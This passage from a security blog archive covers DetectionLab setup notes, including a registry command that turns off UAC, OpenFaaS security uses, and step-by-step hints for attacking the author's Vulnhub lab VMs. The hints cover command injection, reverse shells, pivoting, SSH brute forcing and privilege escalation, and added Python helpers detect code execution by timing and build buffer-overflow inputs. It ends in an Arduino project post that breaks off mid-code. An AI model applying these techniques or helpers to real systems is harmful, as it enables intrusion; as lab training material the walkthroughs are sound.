/></div><div>winlogbeat.yml - winlogbeat config file. You'll have to edit this to change where the logs go. Also, as you start seeing event IDs that are not useful, you can edit this to remove them or modify enable_logging.bat to avoid enabling certain events.</div><div><br /></div><div>setup_winlogbeat.bat - sets up winlogbeat</div><h2 style="text-align: left;">challenges</h2><div>I kept getting errors after I promoted the domain controller and then tried to reboot. Errors were related to winrm. I added </div><div><div> config.winrm.transport = :plaintext</div><div> config.winrm.basic_auth_only = true</div></div><div><br /></div><div>and</div><div><br /></div><div>executed "reg add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /d 0 /t REG_DWORD /f /reg:64" before promoting and that seemed to fix this issue.</div><div><br /></div><div>At the time of posting this blog post, I'm having an issue with workstation1 not installing atomicredteam correctly. AV doesn't get turned off for some reason.</div><div><br /></div><div>I can't change the IP address on kali through vagrant. </div><div><br /></div><div>me typing vagrant destory -f for 10 minutes trying to figure out why it didn't work was also challenging. 
</div><h2 style="text-align: left;">resources</h2><div><a href="https://github.com/clong/DetectionLab">https://github.com/clong/DetectionLab</a></div><div><a href="https://cyberdefenders.org/">https://cyberdefenders.org/</a></div><div><a href="https://github.com/cyberdefenders/DetectionLabELK">https://github.com/cyberdefenders/DetectionLabELK</a></div><div><a href="https://github.com/jckhmr/adlab">https://github.com/jckhmr/adlab</a></div><div><a href="https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course">https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course</a></div><div><a href="https://defensiveorigins.com/">https://defensiveorigins.com/</a></div><div><a href="https://defensiveorigins.com/trainings/">https://defensiveorigins.com/trainings/</a></div><div><a href="https://www.blackhillsinfosec.com/training/applied-purple-teaming-training/">https://www.blackhillsinfosec.com/training/applied-purple-teaming-training/</a></div><div><a href="https://app.vagrantup.com/StefanScherer">https://app.vagrantup.com/StefanScherer</a></div><div><a href="https://app.vagrantup.com/kalilinux/boxes/rolling">https://app.vagrantup.com/kalilinux/boxes/rolling</a></div><div><a href="https://github.com/redcanaryco/atomic-red-team">https://github.com/redcanaryco/atomic-red-team</a></div><div><a href="https://atomicredteam.io/">https://atomicredteam.io/</a></div><div><a href="https://github.com/redcanaryco/invoke-atomicredteam">https://github.com/redcanaryco/invoke-atomicredteam</a></div><div><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon">https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon</a></div><div><a href="https://github.com/olafhartong/sysmon-modular">https://github.com/olafhartong/sysmon-modular</a></div><div><a href="https://www.humio.com/">https://www.humio.com/</a></div><div><br 
/></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-33443756954280867492020-07-05T12:11:00.005-07:002020-07-05T12:11:58.460-07:00Openfaas and infosec uses<b>OpenFaaS:</b><br />
<br />
OpenFaaS is a function as a service project that can be self-hosted, much like AWS Lambda or Google Functions. Essentially, instead of writing a full project that does various things, you write and maintain functions instead. OpenFaaS can be deployed with Docker Swarm, Kubernetes, and OpenShift.<br />
<br />
OpenFaaS documentation is pretty clean and easy to understand. To use it, you need either Docker Swarm, Kubernetes, or OpenShift. Once you deploy OpenFaaS, you need to create a function and deploy it. There are several ways to supply data to the function; one of them is via HTTP requests.<br />
<br />
You can call a function in a sync or async way without modifying any code at all; you just change the URL you're sending the HTTP requests to. In addition to that, OpenFaaS scales on its own: if a function is being used a lot, OpenFaaS will spin up more containers for that specific function automatically. It's also possible to use CI/CD with OpenFaaS to ensure that deploying changes to functions is easy and quick.<br />
<br />
I've been mainly experimenting with OpenFaaS on Vultr but it's also possible to play with it in Docker Playground.<br />
<br />
<b>Infosec use cases:</b><br />
<br />
I looked through some of my past projects and I can see myself using OpenFaaS if I were to rewrite them. Take file analysis, for example: it is possible to combine OpenFaaS with other technologies such as Redis (to keep track of operations) and Minio (to allow download/upload of files/artifacts inside functions) to analyze malicious files or extract metadata from them. In addition to this, you can also implement machine learning, analyze the features of a batch of PE files in a function, and return whether they are malicious or not.<br />
<br />
Another use case is analyzing phishing links. I wrote a golang project that takes links from phishtank and splits them into more URLs recursively and checks each URL to see if there is an open directory. It's possible to completely implement this with OpenFaaS. For example, you can send phishtank data to OpenFaaS function every 8 hours and split each link into multiple URLs, send URLs to another function to detect open directory, finally send the URLs that have open directory to another function that downloads files (this would be phishing kit zip files in most cases) from the open directory.<br />
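As an added example, not from the post or the author's golang project: the split-then-detect chain described above as two OpenFaaS-style Python handlers (the str-in/str-out handle(req) shape of the python3 template, here named handle_split and handle_opendir) chained locally over a constructed feed and constructed page bodies. The "Index of" autoindex heuristic is an assumption, and the final download step is left out.<br />
<br />
```python
import json
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit


def split_url(url):
    """Parent directory URLs of a link, deepest first; file name, query and fragment dropped.
    'http://x.test/a/b/kit.php' -> ['http://x.test/a/b/', 'http://x.test/a/', 'http://x.test/']
    """
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    # A path ending in '/' is already a directory; otherwise drop the file name.
    dirs = segments if parts.path.endswith("/") else segments[:-1]
    out = []
    for depth in range(len(dirs), -1, -1):
        path = "/" + "/".join(dirs[:depth]) + ("/" if depth else "")
        out.append(urlunsplit((parts.scheme, parts.netloc, path, "", "")))
    return out


class _TitleAndH1(HTMLParser):
    """Collects the text of the title and h1 elements of a page."""
    def __init__(self):
        super().__init__()
        self._in = None
        self.title = ""
        self.h1 = ""

    def handle_starttag(self, tag, attrs):
        if tag in ("title", "h1"):
            self._in = tag

    def handle_endtag(self, tag):
        if tag == self._in:
            self._in = None

    def handle_data(self, data):
        if self._in == "title":
            self.title += data
        elif self._in == "h1":
            self.h1 += data


def looks_like_open_directory(html):
    """Heuristic (assumption): Apache and nginx directory listings are titled 'Index of /path'."""
    p = _TitleAndH1()
    p.feed(html)
    return any(t.strip().lower().startswith("index of") for t in (p.title, p.h1))


def handle_split(req):
    """Handler 1 (OpenFaaS python3-template shape, str in / str out): JSON list of
    phishing URLs in, JSON list of unique candidate directory URLs out."""
    seen, out = set(), []
    for url in json.loads(req):
        for parent in split_url(url):
            if parent not in seen:
                seen.add(parent)
                out.append(parent)
    return json.dumps(out)


def handle_opendir(req):
    """Handler 2: {"url": ..., "body": ...} in (the body is fetched by the caller so
    this stays offline), {"url": ..., "open_directory": bool} out."""
    payload = json.loads(req)
    return json.dumps({"url": payload["url"],
                       "open_directory": looks_like_open_directory(payload.get("body", ""))})


def pipeline(feed_json, fetch):
    """Chain the two handlers the way the post describes (split, then detect) and
    return the URLs that look like open directories. fetch(url) returns page HTML."""
    hits = []
    for url in json.loads(handle_split(feed_json)):
        result = json.loads(handle_opendir(json.dumps({"url": url, "body": fetch(url)})))
        if result["open_directory"]:
            hits.append(url)
    return hits


# Constructed sample data (not real PhishTank entries or real sites).
SAMPLE_FEED = json.dumps([
    "http://phish.example/wp-content/uploads/secure/login.php?id=1",
    "http://phish.example/wp-content/uploads/secure/verify.php",
    "http://other.example/",
])
AUTOINDEX_PAGE = ("<html><head><title>Index of /wp-content/uploads/secure</title></head>"
                  "<body><h1>Index of /wp-content/uploads/secure</h1>"
                  "<pre><a href='kit.zip'>kit.zip</a></pre></body></html>")
NORMAL_PAGE = "<html><head><title>Welcome</title></head><body><h1>Hello</h1></body></html>"
FAKE_SITE = {"http://phish.example/wp-content/uploads/secure/": AUTOINDEX_PAGE}


def fake_fetch(url):
    """Stand-in for the HTTP fetch the real detect function would do."""
    return FAKE_SITE.get(url, NORMAL_PAGE)


if __name__ == "__main__":
    print(pipeline(SAMPLE_FEED, fake_fetch))
```
<br />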
<br />
Log analysis or enrichment is another use case. For example, if you were receiving logs about remote sign-ins, you could send the logs in batches or individually to a function or functions to extract IP and do log enrichment based on API lookups for the IP or finding geolocation.<br />
<br />
OpenFaaS can be useful for doing analysis of forensic artifacts. If you're working an incident and need to analyze artifacts from hundreds of computers, you can collect the evidence, throw it in Minio, have a bunch of functions to analyze the evidence, maybe even send the output to another set of functions for enrichment before sending the final evidence to storage or SIEM.<br />
<br />
<br />
<br />
I discovered the OpenFaaS project earlier this month and it has been fun to play with and I can see myself using it a lot. Being able to deploy and maintain specific functions instead of a huge application is much easier for me. Also not having to write code that's threaded and OpenFaaS doing automated scaling is very nice.<br />
<br />
<b>Links:</b><br />
<br />
<a href="https://www.openfaas.com/">https://www.openfaas.com/</a><br />
<a href="https://docs.openfaas.com/deployment/">https://docs.openfaas.com/deployment/</a><br />
<a href="https://docs.openfaas.com/reference/triggers/">https://docs.openfaas.com/reference/triggers/</a><br />
<a href="https://docs.openfaas.com/reference/async/">https://docs.openfaas.com/reference/async/</a><br />
<a href="https://docs.openfaas.com/reference/cicd/intro/">https://docs.openfaas.com/reference/cicd/intro/</a><br />
<a href="https://www.vultr.com/docs/deploying-openfaas-using-docker-swarm">https://www.vultr.com/docs/deploying-openfaas-using-docker-swarm</a><br />
<a href="https://docs.openfaas.com/deployment/play-with-docker/">https://docs.openfaas.com/deployment/play-with-docker/</a><br />
<a href="https://redis.io/">https://redis.io/</a><br />
<a href="https://min.io/">https://min.io/</a><br />
<a href="https://www.phishtank.com/">https://www.phishtank.com/</a><br />
<a href="https://blog.alexellis.io/openfaas-storage-for-your-functions/">https://blog.alexellis.io/openfaas-storage-for-your-functions/</a><br />
<a href="https://youtu.be/XiagsmRVoNY">https://youtu.be/XiagsmRVoNY</a><br />
<br />
<a href="https://www.vultr.com/?ref=7127410">https://www.vultr.com/?ref=7127410</a> (Affiliate link...)Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-17163767592179061352020-04-25T16:57:00.004-07:002020-04-25T16:57:59.581-07:00Vulnhub VMs and guide/hintsI released some VM's on Vulnhub almost a month ago.<div>
<br /></div>
<div>
Link to the VMs: <a href="https://www.vulnhub.com/series/boredhackerblog,295/">https://www.vulnhub.com/series/boredhackerblog,295/</a></div>
<div>
<br /></div>
<div>
This post has guide/hints for those VM's.</div>
<div>
<br /></div>
<div>
<div>
<b>Cloud Antivirus/Cloud AV:</b></div>
<div>
<div>
1. Start by port scanning your network and locate the Easy Cloud AV VM’s IP address.</div>
<div>
a. Port 22 and 8080 should be open and the MAC address should be: 08:00:27:BA:A5:BA</div>
<div>
2. Do an Aggressive nmap scan on the target IP address and find out what services are running.</div>
<div>
3. Visit the web server running on the target IP</div>
<div>
4. You were not provided an Invite code. Bypass the Invite code page.</div>
<div>
a. Input data in the invite form field to cause an error on the web server</div>
<div>
b. Read the error messages and craft input to bypass the invite code page</div>
<div>
5. Get command line injection on the scanner page</div>
<div>
a. Based on scanner output, determine what the input could have been</div>
<div>
b. Inject your own commands</div>
<div>
c. To make sure command execution works, cat /etc/hostname</div>
<div>
i. Output from it will be “cloudav”</div>
<div>
6. Gather information about the users</div>
<div>
a. View linux files that could contain user information</div>
<div>
7. Brute force port 22/SSH</div>
<div>
a. Use the gathered usernames to build a list of usernames and passwords</div>
<div>
b. Use the list for brute forcing port 22/SSH</div>
<div>
8. Examine home directory of users and exploit vulnerable application to get root</div>
<div>
a. Examine the left behind source code</div>
<div>
b. Determine how to inject commands</div>
<div>
c. Inject commands to gain root privileges!</div>
</div>
</div>
<div>
<br /></div>
<div>
<div>
<b>Socnet/social network:</b></div>
<div>
Goal: Get root privilege on the machine (hostname: socnet)</div>
<div>
1. Start by port scanning. Locate socnet VM’s IP address.</div>
<div>
a. Port 22 and 5000 should be open. MAC address should be: 08:00:27:A6:E2:EC</div>
<div>
2. Do an aggressive nmap scan on the target IP and find out which services are running</div>
<div>
3. Visit the webpage on the target IP</div>
<div>
a. Examine it for any vulnerabilities</div>
<div>
4. Use dirb to scan the website for hidden pages</div>
<div>
5. Use the input on the hidden page to test code</div>
<div>
a. https://www.geeksforgeeks.org/exec-in-python/</div>
<div>
b. Try Python’s time.sleep module and see if the website will sleep and take longer to respond. Try a 5 second sleep, then a 10 second sleep, to observe the different response times.</div>
<div>
6. Abuse the code testing functionality to get a reverse shell</div>
<div>
a. http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</div>
<div>
7. Set up a more stable reverse shell with meterpreter</div>
<div>
a. https://netsec.ws/?p=331</div>
<div>
b. Create the reverse shell binary</div>
<div>
c. Transfer the binary to target machine using a webserver on the attacker machine and</div>
<div>
running wget on the target machine</div>
<div>
d. Use metasploit to handle meterpreter reverse shell</div>
<div>
8. Utilize the ‘arp’ command in meterpreter to look for other machines on the target network</div>
<div>
9. Utilize the ‘ifconfig’ command in meterpreter to get the target’s network information</div>
<div>
10. Using metasploit, set up a route via the meterpreter session</div>
<div>
11. Utilize auxiliary/scanner/portscan/tcp to scan other machines on the target network</div>
<div>
12. Google open ports and find out what they’re used for</div>
<div>
13. Utilize meterpreter session to do port forwarding from your local machine to the machine with</div>
<div>
port 9200 open</div>
<div>
14. Utilize curl and query machine with port 9200 open and find what’s running on it, including any</div>
<div>
version numbers</div>
<div>
15. Exploit the service running on port 9200</div>
<div>
a. Search for an exploit that works against the version of the service running on 9200</div>
<div>
b. Utilize the exploit and gain shell access</div>
<div>
c. Examine / directory for interesting files</div>
<div>
16. Utilize the passwords file collected from the machine with port 9200 open, crack the passwords, and</div>
<div>
build a username and password list</div>
<div>
a. https://crackstation.net/</div>
<div>
17. Attack SSH running on the target machine with the username and password list</div>
<div>
18. After logging in successfully on the target machine via SSH, gather machine information</div>
<div>
a. Get OS info</div>
<div>
b. Get kernel info</div>
<div>
c. Arch info (64bit or 32bit)</div>
<div>
19. Use privesc exploit to get root privs</div>
<div>
a. Utilize collected info to search for privesc exploits</div>
<div>
b. Compile the privesc exploits and transfer the compiled files to target system using SCP</div>
<div>
c. Execute the exploits to finally get root privs</div>
</div>
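<div>Step 5b (timing a time.sleep payload) as an added Python example, not code from the original post. The decision logic checks that a 5 second and a 10 second sleep each shift the response time by about their own length, which separates real code execution from a server that is merely slow or under load. The URL and form field name in the main block are hypothetical; the lab's real values come from the hidden page found with dirb.</div>

```python
"""Confirm blind code execution by timing a sleep payload: the response should
take about the requested number of seconds longer than a baseline request,
and a longer sleep should shift it by correspondingly more."""
import time
import urllib.parse
import urllib.request
from statistics import median


def timed_request(url, field, payload, timeout=30):
    """POST a single form field and return the round-trip time in seconds."""
    data = urllib.parse.urlencode({field: payload}).encode()
    start = time.monotonic()
    with urllib.request.urlopen(url, data=data, timeout=timeout) as resp:
        resp.read()
    return time.monotonic() - start


def looks_like_sleep(baseline, delayed, expected_seconds, tolerance=1.0):
    """True if the delayed response took about expected_seconds longer than baseline."""
    return abs((delayed - baseline) - expected_seconds) <= tolerance


def confirm_execution(timings, sleeps=(5, 10), tolerance=1.0):
    """timings maps requested sleep seconds to measured response time, with key 0
    as the baseline. Every sleep must shift the response by about its own length:
    a server that is simply slow or overloaded will not track the requested delay."""
    baseline = timings[0]
    return all(looks_like_sleep(baseline, timings[s], s, tolerance) for s in sleeps)


def probe(url, field, sleeps=(5, 10), samples=3):
    """Measure the baseline and each sleep payload; the median of a few samples
    smooths out network jitter."""
    timings = {}
    for seconds in (0,) + tuple(sleeps):
        payload = f"import time; time.sleep({seconds})" if seconds else "pass"
        timings[seconds] = median(timed_request(url, field, payload)
                                  for _ in range(samples))
    return timings


if __name__ == "__main__":
    # Hypothetical URL and field name: the real hidden page and its form field
    # are whatever dirb and the page source reveal on the socnet VM.
    measured = probe("http://10.0.0.5:5000/hidden-page", "code")
    print(measured)
    print("code execution confirmed" if confirm_execution(measured) else "inconclusive")
```

<div>Two different sleep lengths matter: a single 5 second delay can be coincidence or a slow backend, but a response that tracks 5 and then 10 seconds is the server running the payload.</div>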
<div>
<br /></div>
<div>
<div>
<b>Socnet2/social network 2:</b></div>
<div>
Goal: Get root privilege on the machine</div>
<div>
1. Start by port scanning and locating socnet2 VM.</div>
<div>
a. Port 22, 80, and 8000 should be open. MAC address should be: 08:00:27:e9:e5:e6</div>
<div>
2. Do an aggressive nmap scan and find more information about the services running</div>
<div>
3. Visit webservers</div>
<div>
4. Visit webserver on port 80 and examine it</div>
<div>
a. Sign up</div>
<div>
b. Explore the site</div>
<div>
c. Look for any issues</div>
<div>
5. Get a backdoor on the webserver</div>
<div>
a. Utilize file upload functionality to get a backdoor on the webserver</div>
<div>
b. Run the backdoor</div>
<div>
6. Utilize the backdoor to find more information about what’s running on port 8000</div>
<div>
a. Examine the file system, processes</div>
<div>
b. Be sure to read social network posts as well</div>
<div>
7. Abuse the service running on port 8000 to get another shell</div>
<div>
a. Examine the source code for the service running on port 8000</div>
<div>
b. Write a custom tool/script to gain a shell through the service running on port 8000</div>
<div>
i. https://docs.python.org/2/library/xmlrpclib.html</div>
<div>
8. Load a meterpreter backdoor on the victim machine and utilize it to examine files in the user’s</div>
<div>
directory</div>
<div>
9. Write an exploit for the SUID binary</div>
<div>
a. Find the SUID binary in the user folder</div>
<div>
b. Binary includes a backdoor function</div>
<div>
i. https://github.com/radareorg/cutter</div>
<div>
c. Download the binary, then use a debugger and different inputs to trigger a crash and control</div>
<div>
the EIP</div>
<div>
d. Create a working exploit that launches backdoor function</div>
<div>
10. Put the exploit on victim machine and exploit the SUID binary to get root</div>
</div>
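<div>Step 9c (using different inputs to control EIP) as an added Python example that is not from the original walkthrough. A cyclic pattern, in the same style as Metasploit's pattern_create, is fed to the binary; the EIP value read in the debugger is unpacked as little-endian and located in the pattern, which gives the offset of the saved return address. The EIP value and the return address used below are constructed for illustration, not values from the socnet2 binary.</div>

```python
"""Locate the saved return address in a stack overflow with a cyclic pattern,
the same idea as Metasploit's pattern_create.rb / pattern_offset.rb."""
import struct
from itertools import product

UPPER = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = b"abcdefghijklmnopqrstuvwxyz"
DIGIT = b"0123456789"


def cyclic_pattern(length):
    """Return 'Aa0Aa1Aa2...' truncated to length bytes. Every 4-byte window is
    unique, so the bytes that land in EIP identify their own position. The
    alphabet runs out after 26*26*10*3 = 20280 bytes."""
    out = bytearray()
    for upper, lower, digit in product(UPPER, LOWER, DIGIT):
        out += bytes((upper, lower, digit))
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern, eip_value):
    """eip_value is the 32-bit EIP read from the debugger after the crash.
    x86 is little-endian, so pack it back into the 4 bytes that overwrote the
    saved return address, then find them in the pattern. Returns -1 if absent."""
    needle = struct.pack("<I", eip_value)
    return pattern.find(needle)


def crash_input(offset, return_address, filler=b"A"):
    """Filler up to the saved return address, then the address to return into
    (for the lab, the address of the binary's backdoor function)."""
    return filler * offset + struct.pack("<I", return_address)


if __name__ == "__main__":
    pattern = cyclic_pattern(500)          # feed this to the binary, e.g. as argv[1]
    # Constructed example: suppose the debugger then shows EIP = 0x64413764.
    offset = pattern_offset(pattern, 0x64413764)
    print("offset of saved return address:", offset)
    # 0x080484b6 stands in for the backdoor function's address (constructed).
    print(crash_input(offset, 0x080484b6))
```

<div>If pattern_offset returns -1 the crash did not overwrite EIP with pattern bytes (wrong input vector, or the pattern was too short), so lengthen the pattern or change where it is fed before trusting an offset.</div>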
<div>
<br /></div>
<div>
<div>
<b>Moriarty Corp:</b></div>
<div>
Goal: Get all the flags</div>
</div>
<div>
<br /></div>
<div>
No guide or hints. Sorry.</div>
<div>
<br /></div>
<p><b>Using Thotcon 0x8 (Arduino Leonardo) badge and DeskCycle to walk/run in video games!</b> (2019-04-20)</p><span id="docs-internal-guid-75e53f69-7fff-e754-cd99-f302330ad0f6"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">I bought a DeskCycle (</span><a href="https://deskcycle.com/products/deskcycle-under-desk-bike" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://deskcycle.com/products/deskcycle-under-desk-bike</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) so I can mindlessly cycle at home while working on other tasks. (I’m not 100% sure of the health impact, but it doesn’t really matter for now.) Of course, it came with a display that lets you track your speed, distance, etc. It also came with a 3.5mm aux audio cable that you can use if you want the tracker display on your desk. I had the idea of using the DeskCycle to walk or run in games like Just Cause 3, or any similar game that has good visuals. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The first thing I did was Google to see if anyone had interfaced an Arduino with the DeskCycle, and someone had. The Neave Engineering blog (</span><a href="https://neave.engineering/?s=deskcycle" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://neave.engineering/?s=deskcycle</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) has three articles on interfacing the DeskCycle with an Arduino. One of the articles (</span><a href="https://neave.engineering/2015/04/03/arduino-speedometer-for-the-deskcycle/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://neave.engineering/2015/04/03/arduino-speedometer-for-the-deskcycle/</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) mentions that there is a switch that closes as cycle revolutions happen, which made my job easier. Basically, the input from the 3.5mm jack can be treated like a button input. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This is where the Thotcon (</span><a href="https://thotcon.org/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://thotcon.org/</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) 0x8 badge comes in. The Thotcon 0x8 badge is built on the Arduino Leonardo, which can also work as a keyboard! (A Teensy would work too, but I had a Thotcon badge sitting around.) A hackaday.io project post had the instructions to reprogram the badge via the ICSP header (</span><a href="https://hackaday.io/project/21797-thotcon-0x8-badge/log/59432-badge-hacking-update" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://hackaday.io/project/21797-thotcon-0x8-badge/log/59432-badge-hacking-update</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">). It involves connecting an AVR programmer and then burning the bootloader. After that, the badge can be reprogrammed via USB. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">At this point, I hadn’t read the whole article from Neave Engineering. I spent hours trying to make the badge press and hold the ‘w’ key (to walk forward in a game) in a bunch of different ways. For some reason, key presses would stop or weren’t continuous, and I had other issues too. I went back and looked at the Neave Engineering post again and decided to reuse that code. The Neave Engineering code can be found here: </span><a href="https://github.com/kneave/dcspeedo/blob/master/speedo/speedo.ino" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://github.com/kneave/dcspeedo/blob/master/speedo/speedo.ino</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">. The code comments are very useful! </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">I cut my 3.5mm cable, found the two wires that connect when a cycle/revolution happens, and attached one to ground and one to pin 12 (the variable name is trigger in the code). As far as I can tell, the bottom row of pins on the Thotcon 0x8 badge are all ground pins, although I might be wrong. I didn’t closely test all of them. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Here’s my badge, with DeskCycle output pins attached to pin 12 and ground:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><img height="573" src="https://lh4.googleusercontent.com/7ohApT7bd5XRqxkl6PbxSAVMB0q0JvjGeUtsVtBt_J5ykaiSSjtakav7Z3AhKwkn1VEljXUutwTSkKUj14CLQs5pOez41raYNtGx_Af-niFIsZASAp7-3l4vPakszABCj7wrtdyN" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="417" /></span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><img height="386" src="https://lh4.googleusercontent.com/lAnQ15wtP7sS0YIo521l5endjaKdAP0-iPwvlN-rEc4IXztCcMakmf1WYGhyEyT4IDPRo08O7U5t4NxtDOTI_BbDBnf5oRDgHaXS7Sdl15Isjn6KXVadWna8idbr5BIZ1-Bk99Gm" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="414" /></span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Here’s my modified code that does a keypress:</span></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">#include <Keyboard.h></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">// Speed constants from Neave Engineering's speedo.ino</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const float pi = 3.14159265;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const float inchesPerMile = 63360;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const int wheelSize = 26;             // equivalent wheel diameter in inches</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const float gearRatio = 2.75;         // wheel revolutions per pedal revolution</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const float wheelCircumference = wheelSize * pi;</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">// Written in the timer ISR and read in loop(), so these are volatile.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">volatile unsigned long lastTriggerTime = 0;</span></div>
